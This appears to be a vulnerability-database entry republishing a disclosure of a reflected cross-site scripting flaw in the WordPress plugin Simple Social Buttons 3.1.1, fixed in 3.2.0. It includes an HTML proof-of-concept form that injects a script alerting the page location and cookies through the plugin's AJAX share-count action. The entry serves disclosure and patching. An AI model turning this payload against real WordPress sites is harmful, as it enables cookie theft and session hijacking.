Lucene search
K

WordPress Simple Social Buttons 3.1.1 Cross Site Scripting

🗓️ 17 Dec 2020 00:00:00Reported by Mr.FType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 306 Views

WordPress Simple Social Buttons 3.1.1 Cross Site Scripting vulnerability found and fixed in version 3.2.

Code
`The WordPress plugin Simple Social Buttons version 3.1.1 (a.k.a. Simple Social Media Share Buttons) suffers from a reflected cross-site scripting vulnerability found by Mr.F. It was fixed in version 3.2.0:  
  
https://wordpress.org/plugins/simple-social-buttons/#developers  
  
HTML POC:  
  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>xss poc</title>  
</head>  
<body>  
<form method="post" action="http://the.host.name/wp-admin/admin-ajax.php">  
<input type="hidden" name="action" value="ssb_facebook_shares_update" />  
<input type="text" name="share_counts" value="-17<script>alert(document.location);alert(document.cookie);</script>" />  
<input type="text" name="post_id" value="1337" />  
<input type="submit" value="Submit!" />  
</form>  
</body>  
</html>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation